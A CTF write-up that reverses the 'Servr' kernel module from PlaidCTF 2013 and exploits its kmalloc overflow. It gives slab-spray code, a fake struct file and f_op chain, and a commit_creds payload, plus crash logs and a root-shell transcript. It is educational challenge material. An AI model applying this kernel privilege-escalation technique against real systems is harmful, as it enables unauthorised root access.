PlaidCTF 2013 > Servr - pwn 400
When someone told me to go check this "web" chall out, I was rather surprised, but I gave it a shot. The challenge was presented with this archive containing a qemu-ready Linux system. The system boots perfectly fine and we get what looks like an LKM, servr.ko, in /home/servr. At this point I extract the content of the root fs:
$ tar -jxvf servr.tar.bz2 $ mkdir rootfs && cd rootfs $ gzip -dcS .img ../servr/initramfs.img | cpio -id 3804 blocs $ ls bin dev etc home init proc root sys tmp var $ file home/servr/servr.ko home/servr/servr.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), [...], not stripped $
So we do indeed have an x64 LKM to reverse. I guess I should take a look at web challenges more often :)
As the module is not stripped, it is not nearly as painful as it could be. servr_init contains a kernel server socket initialization:
void servr_init() { workqueue = __alloc_workqueue_key("servr", 1, 0, 0); free_workqueue = __alloc_workqueue_key("servr_free", 1, 0, 0); sock_create_kern(2,1,6,&server_sock); memset(&var_20, 0, 0x10); &var_20 = 2; &var_1E = 0x5000; kernel_bind(server_sock, &var_20, 0x10); kernel_listen(server_sock, 10); spin_lock_bh(&server_sock->sk_lock.slock); server_sock->sk_data_ready = server_sock_data_ready; spin_unlock_bh(&server_sock->sk_lock.slock); printk("Module loaded\n"); }
The main information we get here is that the socket is TCP (IP + SOCK_STREAM), on port 80 (0x5000 in little-endian) and that its processing callback is server_sock_data_ready. On to this next function, we see that it does not much except waking up the servr workqueue for the accept_connection job, handled by accept_connection_cb. This callback performs kernel_accepts, and sets some callbacks for the new accepted client sockets. Those new functions are similar: from client_sock_data_ready to client_work_cb().
This function is much longer so I won't detail it. What it basically does is:
The body of the request (after "\r\n\r\n") is at *(r15 + 0x68) = *(rbx + 0x60). The content-length header, if any, sets up r15 + 0x70 = rbx + 0x68 = *rbp + var_B0:
loc_A3C: mov [r11+10h], r14 mov [r11+18h], r13 mov rdi, offset aContentLength mov rsi, r14 mov ecx, 0Fh repe cmpsb jz loc_B20 loc_B20: mov rdx, [rbp+var_B0] mov esi, 0Ah mov rdi, r13 mov [rbp+var_B8], r11 call kstrtoll test eax, eax mov r11, [rbp+var_B8] jz loc_A5B mov qword ptr [r15+70h], 0 jmp loc_A5B [...] loc_A7C: mov rax, [rbx+68h] cmp rax, 1000h ja short send_error
And this field cannot be above 0x1000. On to the finish_handle_request, having r15 as its only arg:
loc_593: mov rdi, [rdi+70h] test rdi, rdi jz loc_660 // clength == 0 mov [rbx+80h], rdi mov esi, 80D0h call __kmalloc // kmalloc(clength) test rax, rax mov [rbx+78h], rax jz loc_660 mov r8, 0D4B4F2030303220h // HTTP response headers mov r9, 3A7265767265530Ah mov r10, 312F727672657320h mov r11, 746E6F430A0D302Eh mov rcx, 702F74786574203Ah mov rdi, 312E312F50545448h mov rdx, 657079742D746E65h mov rsi, 0A0D0A0D6E69616Ch mov byte ptr [rbx+90h], 1 mov [rax+8], r8 mov [rax+10h], r9 mov [rax+18h], r10 mov [rax+20h], r11 mov [rax+30h], rcx mov [rax], rdi mov [rax+28h], rdx mov [rax+38h], rsi mov byte ptr [rax+40h], 0 mov rdi, [rbx+78h] mov rsi, [rbx+68h] ; src mov rdx, [rbx+70h] ; n add rdi, 40h ; dest call memcpy
There is a kmalloc with the size of the body, then 0x40 bytes are copied at the beginning - the HTTP response headers -, to which the original request body is concatenated by this last memcpy. So we have a buffer total length of 0x40 + our content length header, whereas the kmalloc was only the size of the content length. This is a classical kmalloc() overflow, as the hints suggested.
To optimize allocations, the kernel pre-allocates pages (or slabs), containing several chunks of the same memory size, for well-known kernel objects such as inodes or task_struct, or for general-purpose allocation (kmalloc-32, kmalloc-96, kmalloc-1024, ...). To get more details on Linux kernel allocators, check out this article. What is nice in this case is that we can choose in which slab kmalloc will allocate its object, as we control the length. What isn't is that the overflow is only 0x40 bytes, which isn't a whole lot.
The goal in kmalloc overflows is to force a well-known kernel object to be allocated just after the overflowed one. We spray the slab of a particular kernel object by asking lots of allocations from userspace. We delete one of them through a kfree(). We allocate a chunk of the same size, which should be placed at the place of our kfreed object, just before one of ther other sprayed objects. If this object contains a function pointer or a pointer dereferenced to write data in a kernel path we can trigger from userspace, we can execute code in ring0.
A nice struct to overwrite is the struct file, as it contains a pointer to a function pointers struct, f_op. So the idea is to create a lot of files, discover in which slqb the structs are created, and perform an overflow in this one: exactly what I didn't do during the actual CTF, as I was sure that struct file ought to be in kmalloc-128 - gg no re. We can change the init file to set uid=0 and be able to check the /proc/slabinfo file (repack the initramfs with find . | cpio --create --format='newc' > /tmp/initramfs.img at the root and gunzip it).
int main() { int i; int * files; char tmpfile[100]; files = malloc(sizeof(int)); check_slabs(); /* Spray slab with file structs */ for (i=0;;i++) { sprintf(tmpfile, "/tmp/tmpfile%d", i); files = realloc(files, (i+1)*sizeof(int)); if ((files[i] = open(tmpfile, O_RDWR|O_CREAT|O_SYNC)) < 0) break; } close(files[0]); check_slabs(); return 0; }
We close one file descriptor or else we cannot open /proc/slabinfo. We can see several differences between the two slab checks:
# /home/servr/test # name <active_objs> [...] inode_cache 3276 dentry 3276 kmalloc-256 448 kmalloc-16 2560 [+] Created 1021 files # name <active_objs> [...] inode_cache 4298 dentry 4305 kmalloc-256 1456 kmalloc-16 3584 / #
As expected, we see the number of inodes, dentries, etc.. go up, as well as two object-specific slabs. 16 cannot be the one we are searching for, so it has to be 256. Knowing this, we try to allocate a large number of files, delete one of them, trigger the overflow, and do an arbitrary write operation on every file. If one of their descriptor has been overwritten, the system should crash. Actually, trying that, nothing happens. This may be because other objects are allocated in this slab before the targetted kmalloc happens, so we need to delete more files. Nothing for 2 files either, let's try 3:
/ $ /home/servr/test 3 [+] Created 1021 files [+] Payload sent (296 bytes) [ 10.025136] general protection fault: 0000 [#1] SMP [ 10.025136] Modules linked in: servr(O) [ 10.025136] CPU 0 [ 10.025136] Pid: 840, comm: test Tainted: G O 3.8.7 #35 Bochs Bochs [ 10.025136] RIP: 0010:[<ffffffff8112dd12>] [<ffffffff8112dd12>] vfs_write+0x32/0x180 [ 10.025136] RSP: 0018:ffff880002faff08 EFLAGS: 00000206 [ 10.025136] RAX: 4141414141414141 RBX: ffff880002832900 RCX: ffff880002faff50 [...] [ 10.025136] [<ffffffff8112e0bd>] sys_write+0x4d/0x90 [ 10.025136] [<ffffffff8178c052>] system_call_fastpath+0x16/0x1b [...]
Which works. Now we just have to craft our struct file data a bit, so that it passes the different checks in vfs_write and some of its subcalls such as rw_verify_area. Thoses functions are not very long, so we can do this pretty easily:
void setup_file(char * file) { *(char **)(file + 0x18) = dentry_addr; *(char **)(dentry_addr + 0x30) = inode_addr; *(char **)(inode_addr + 0x38) = i_security_addr; *(char **)(inode_addr + 0x138) = 0; //inode->flock *(char **)(file + 0x20) = f_op_addr; *(char **)(f_op_addr + 0x18) = write_addr; *(char **)(f_op_addr + 0x28) = aio_write_addr; *(file + 0x3c) = 2; // FMODE_WRITE *(file + 0x3f) = 1; // FMODE_NOTIFY *(char **)(file + 0x40) = 0; // pos }
All those addresses are arbitrary addresses that have to be valid. Because we are directly switching from userland to kernel space with a write syscall, our process' address space is still valid during kernel code execution. The pointer to be executed is f_op->write, so we have write_addr pointing to a basic kernel exploit code:
int __attribute__((regparm(3))) leetbbq() { commit_creds(prepare_kernel_cred(0)); return 0; // avoid fsnotify }The full exploit code is available here:
/ $ /home/servr/sploit 3 [+] Looking up kernel symbols... [+] Resolved symbol commit_creds to 0xffffffff81063250 [+] Resolved symbol prepare_kernel_cred to 0xffffffff81063510 [+] Created 1021 files [+] Payload sent (296 bytes) [+] Launching root shell! / # id uid=0(root) gid=0(root) / #
A shame that I was blindly overflowing into kmalloc-128 the whole sunday for some reason... Great CTF challenge, PPP delivers yet again.
You can etiher echo -en the hex version of your executable, or base64 encode it for instance. I'll update the article with that next week.
Excellent post. Could you please give the steps to compile/port the code to qemu image?
Thanks.
Excellent article !